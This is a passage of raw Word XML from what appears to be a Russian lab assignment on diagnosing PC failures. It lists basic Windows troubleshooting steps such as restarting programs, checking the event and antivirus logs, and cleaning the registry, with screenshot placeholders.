    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Согласно инструкции из теоретической части провести </w:t>
      </w:r>
      <w:r w:rsidR="000717C8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>тестирование оборудования на наличие системного сбоя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся скриншоты этапов выполнения работы и комментарии к ним.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Алгоритм определения причин сбоев и неисправностей ПК</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Сбой нормальной работы компьютера – неприятность весьма </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>популярная</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Одни из нас, столкнувшись с BSOD’ом или невозможностью запуска нужной программы, начинают паниковать. Другие приступают к поиску знатоков среди знакомых, друзей или коллег. Третьи, засучив рукава, мысленно готовятся к переустановке ОС. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Между тем с большинством системных ошибок можно попытаться справиться самостоятельно и куда более гуманными методами, чем повторная инсталляция Windows, которая порой растягивается на несколько дней</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Предлагаемая схема действий не потребует наличия у пользователя знаний и навыков системного администратора или каких-либо дополнительных затрат. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Панацеей от всех бед и безусловным руководством к действию его назвать нельзя, но прежде чем искать системный диск или звонить в сервисный центр, стоит попробовать менее радикальные методы </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>лечения</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Для удобства они разделены на две группы. Первая предполагает исключительно программный тюнинг, а для реализации второй потребуется вскрыть системный блок и иметь навыки самостоятельной сборки. Об этом мы с вами сегодня и поговорим.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выявление неисправностей на уровне ОС</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Перезапустите программу, работа которой завершилась сбоем</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">К вящей радости фанатов Apple, Windows до сих пор не избавилась от многих </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>болезней роста</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, а спонтанные и ничем не объяснимые глюки случаются даже на достаточно мощных компьютерах</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Потому не исключено, что повторный запуск приложения решит все ваши проблемы, хотя вероятность этого, скажем прямо, достаточно низка.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2255925" cy="1274400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="229" name="Рисунок 1" descr="Окно с надписью о сбое в программе Windows">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кно с надписью о сбое в программе Windows">
                      <a:hlinkClick r:id="rId217"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId218" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2255925" cy="1274400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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t>Рисунок 1 Сбой программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Перегрузите компьютер.</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b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ОС от Microsoft имеет привычку со временем накапливать ошибки, потому более чем на 2–5 дней беспроблемной работы системы обычно не хватает</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Но если кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reset</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> вы вынужденно нажимаете чуть ли не каждый день, стоит задуматься о полной переустановке, а не </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>лечить зубную боль анальгетиками</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Проверьте журнал событий</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Всем системным администраторам известно, что ОС старательно фиксирует каждый шаг пользователя</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В обычной жизни эта информация никому не нужна, но если ваш компьютер начинает чудить, данные могут оказаться полезными. Для доступа к журналам событий нажмите правую кнопку мыши (далее ПКМ) на иконке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мой компьютер</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, выберите строчку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Управление</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и в списке категорий раскройте ниспадающий список </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Журналы Windows</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для облегчения задачи стоит отфильтровать события (правый столбик, пункт </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фильтр текущего состояния</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, уровень события </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Критическое</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ошибка</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>). Далее действовать по ситуации.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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2140278" cy="1188000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="228" name="Рисунок 2" descr="Запуск журнала событий в Виндоус">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апуск журнала событий в Виндоус">
                      <a:hlinkClick r:id="rId219"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId220" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2140474" cy="1188109"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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t>Рисунок 2. Запуск журнала</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Просмотрите лог работы антивируса</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Многие программы, призванные защищать компьютер от вирусных атак, предпочитают действовать незаметно, отчего некоторые вполне безопасные утилиты сразу же после запуска либо отправляются в карантин, либо безжалостно удаляются</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Этим, кстати, славятся многие </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>автоматические</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> антивирусы (Norton, BitDefender, AVG, Panda). Если подозрения подтвердились, попробуйте внести программу в список исключений. Довольно часто это, увы, оказывается недостаточным, и тогда стоит выбрать другой защитный пакет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Почистите реестр от ошибок.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Рецепт достаточно неоднозначный, так как большая часть соответствующих утилит в руках дилетанта может привести к еще большим проблемам, вплоть до необходимости аварийной переустановки ОС. Одна из самых </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>безобидных</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> программ подобного класса – CСleaner. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После проверки (желательно, двойной) обязательно перезапустите компьютер</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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2090550" cy="1061528"/>
            <wp:effectExtent l="19050" t="0" r="4950" b="0"/>
            <wp:docPr id="227" name="Рисунок 3" descr="Изображение на странице программы для чистки реестра">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на странице программы для чистки реестра">
                      <a:hlinkClick r:id="rId221"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId222" cstate="print"/>
                    <a:srcRect l="4745" t="14209" r="4654" b="4010"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2090219" cy="1061360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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t>Рисунок 3. Чистка реестра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
